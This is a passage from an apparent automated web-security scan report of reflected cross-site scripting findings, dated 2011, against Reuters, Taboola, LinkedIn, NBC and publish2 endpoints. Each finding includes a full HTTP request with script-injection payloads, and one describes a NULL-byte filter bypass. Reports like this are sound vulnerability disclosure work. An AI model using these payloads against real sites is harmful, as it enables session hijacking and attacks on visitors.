GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback69220<script>alert(1)</script>530070fbb12 HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA_CP15 (build: CVSTag=https://svn.jboss.org/repos/jbossas/tags/JBoss_4_0_5_GA_CP15 date=200901081058)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:57 GMT
Content-Length: 172
Content-Type: text/html

__nbcsnasadops.doSCallback69220<script>alert(1)</script>530070fbb12({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60"}});

5.71. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload b735b<script>alert(1)</script>6863dfd174b was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reuters/trc/2/json?tim=19%3A48%3A52.780&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=500&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&llvl=1&item-id=USTRE78222D20110904&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&page-id=7ec1fa180194eff20c8fb72aa34c5e7764c06279&sd=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030&uid=ae7f02b7-d8fc-4e74-9744-efca878a3ea7&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1b735b<script>alert(1)</script>6863dfd174b HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097030; taboola_wv=; taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7; JSESSIONID=.prod2-f3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:03:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315098192;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 01:03:12 GMT
Content-Length: 4004

TRC.callbacks.recommendations_1b735b<script>alert(1)</script>6863dfd174b({"trc":{"req":"62cd8c982855cc3f7a6f23b1340af084","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_131
...[SNIP]...

5.72. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c23af<img%20src%3da%20onerror%3dalert(1)>8205f4fbbb7 was submitted in the url parameter. This input was echoed as c23af<img src=a onerror=alert(1)>8205f4fbbb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904c23af<img%20src%3da%20onerror%3dalert(1)>8205f4fbbb7 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-LI-IDC=C1; bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G; NSC_MC_WT_FU_IUUQ=ffffffffaf1994c945525d5f4f58455e445a4a42198d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:58:54 GMT
Content-Length: 182

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.reuters.com\/article\/2011\/09\/04\/us-weather-football-idUSTRE78222D20110904c23af<img src=a onerror=alert(1)>8205f4fbbb7"});

5.73. http://www.publish2.com/newsgroups/state-worker.js [_ parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The value of the _ request parameter is copied into the HTML document as plain text between tags. The payload aede9<a>fb44affacea was submitted in the _ parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789aede9<a>fb44affacea HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=tjqibcmmv4ife4uj4v539uolt4; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=6pJEXIffSQeOxbFJRglsy1N3NgAhoMtdMg0KP5%2FMCS1HfmmNr3Jc4UrzwEAcqYQmxttgfAUC5fWHasy3%2BuUKcK8VH6PA6LJDnKm7GUG5M2J4HcEhb1cmLD%2BcGlocHzy%2BCA9ycFwrZSyf0cgynGrESRtIEbKRNRQaYkO4C%2Fv5KAGduUZjFPmMge%2FgVEePPdgA4mh8yj%2BAIeKVACzUCrRiBNj9hNLQSZ0ghY8I6b4OznDrCm5FrRwQnZJhEFCHdBWAq%2Fx86YMPs5UBVGGQxwwWchEqVUJ%2FGREixrecBVlbcJeKUI4C9af0OM1EbMfYd7amL26MSFTPGwXfLudqJ79Rg%2FfJOPurn0yLy8smVyr16RKXJ9PPEWZT; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12581

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789aede9<a>fb44affacea","sitelink":"http:\/\/www.publish2.com\/","description":"Links of interest to California state workers and those who follow the bureaucracy.","last_build_date":"Sun, 04 Sep 2011 01:03:22 +0000","total
...[SNIP]...

5.74. http://www.publish2.com/newsgroups/state-worker.js [jsonp_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The value of the jsonp_callback request parameter is copied into the HTML document as plain text between tags. The payload 442ea<script>alert(1)</script>060310a8b2e was submitted in the jsonp_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812442ea<script>alert(1)</script>060310a8b2e&_=1315097336789 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=f54702b4i9nutq0ri22oj2ip01; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=UjRvqJa9Eqx5QsHwXvtTAMlRPn1qqiKkaBofe%2BXITQxJQ4qocxvavqYqKhREHwrdbOrJ%2Fu8dghXYIhnb1PK%2FGa1yI4z2ClG0Tr36e08qdUGK5giXu45KviCKOjymZvAh4QGtRmz2puRlWEtbuX1soBcVfTsIym4QT2GSrDqo%2BPeyfoSk2SBwg%2FPiQFu5IjmNBMie2n0Yt5zUdDiHp2S17Kji7v%2FOnij3QnRVk%2FbdtToibIVs9BxzVpMsNVOzvOwfJ4HCZUN7pPZ1fQ9PLRxdUjlkK24nF2Aw61jWyLwlzyPsKyWYqdwwSg6YRn1nT9xutqwdXuK7syz026lFuBxN0fqCRL05hslZvNWzYkYAJe6Bf%2BEfmGgg; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12645

jQuery15205311797398608178_1315097321812442ea<script>alert(1)</script>060310a8b2e({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812442ea<script>
...[SNIP]...

5.75. http://www.publish2.com/newsgroups/state-worker.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00d2877<a>a00f557732f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2877<a>a00f557732f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789&%00d2877<a>a00f557732f=1 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Sat, 04-Sep-2010 01:03:40 GMT; path=/
Set-Cookie: kohanasession=lbcsf8itchvlv8shikh8vhsdd6; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=byTxifj9sEuzmxkMB8HE9YLK6MkctiF77DZp6uQNjjPv8OHj9z3%2BTnkuRPNaIkM1Y9s1dqvSPGjs%2Bl90USsr7gr2FyFio9LpVYl5Y8nEt6peSvTt0E3QrkSbCp2vOGTii43s1DJ8pYmHK0KAyzjjo8VYWSqpNRlRCPmC7U8XtLZxuyGorYN34pUhKXPsOsNPZeszXIuXuTEpTAANTbLF8jSJ381L%2Bm818ESSYQp7PoBNsFAzcfs5c2%2Bv%2Bcv289Y0SbCOt8RtoliIrBcO4k4K6Gpekg0mtI9J5xTagcGLjR4SVdCtabQkmnKxH4mRUA%2FLSSFn5%2BXFADxk6pFLiNQHeuHamh7A28%2Bups3KhR9eXN0UJv1LnAAc; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12587

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789&%00d2877<a>a00f557732f=1","sitelink":"http:\/\/www.publish2.com\/","description":"Links of interest to California state workers and those who follow the bureaucracy.","last_build_date":"Sun, 04 Sep 2011 01:03:42 +0000","tot
...[SNIP]...

5.76. http://www.reuters.com/assets/commentsChild [articleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the articleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c07"><script>alert(1)</script>e18cfb78b21 was submitted in the articleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D2011090442c07"><script>alert(1)</script>e18cfb78b21&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 4900

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF26 <![endif]-->
<!--[if !IE]> token: 892733d4-f219-4aaf-a26f-4ff2daae13fd <
...[SNIP]...
<input type="hidden" name="article_id" value="USTRE78222D2011090442c07"><script>alert(1)</script>e18cfb78b21" />
...[SNIP]...

5.77. http://www.reuters.com/assets/commentsChild [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de11a"><script>alert(1)</script>663f7664906 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNewsde11a"><script>alert(1)</script>663f7664906&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5213

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF13 <![endif]-->
<!--[if !IE]> token: 07237ae1-8f58-470a-bbcb-d116e1992d4f <
...[SNIP]...
<input type="hidden" name="channel" value="domesticNewsde11a"><script>alert(1)</script>663f7664906" />
...[SNIP]...

5.78. http://www.reuters.com/assets/newsFlash [&flashPath parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the &flashPath request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e58d'%3balert(1)//87be1ff7cb was submitted in the &flashPath parameter. This input was echoed as 6e58d';alert(1)//87be1ff7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D16e58d'%3balert(1)//87be1ff7cb&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:24 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10745

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF31 <![endif]-->
<!--[if !IE]> token: 75d68b0e-7e26-420d-a60c-5ba564f496b3 <
...[SNIP]...
ockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728',
           'height', '90',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=16e58d';alert(1)//87be1ff7cb',
           'quality', 'high',
           'pluginspage', 'http://www.macromedia.com/go/getflashplayer',
           'align', 'middle',
           'wmode', 'transparent',
           'id', 'flash',
           'bgcolor', '#ffffff',
           'name', '
...[SNIP]...

5.79. http://www.reuters.com/assets/newsFlash [&flashPath parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the &flashPath request parameter is copied into an HTML comment. The payload a467f--><script>alert(1)</script>ce7cfc0e2c5 was submitted in the &flashPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1a467f--><script>alert(1)</script>ce7cfc0e2c5&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:28 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10796

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF14 <![endif]-->
<!--[if !IE]> token: 8b34b729-2f70-45ff-ba51-15184d439003 <
...[SNIP]...
<!-- http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1a467f--><script>alert(1)</script>ce7cfc0e2c5 -->
...[SNIP]...

5.80. http://www.reuters.com/assets/newsFlash [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669f1'%3balert(1)//52a8ec3cf2b was submitted in the h parameter. This input was echoed as 669f1';alert(1)//52a8ec3cf2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728&h=90669f1'%3balert(1)//52a8ec3cf2b&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:52 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
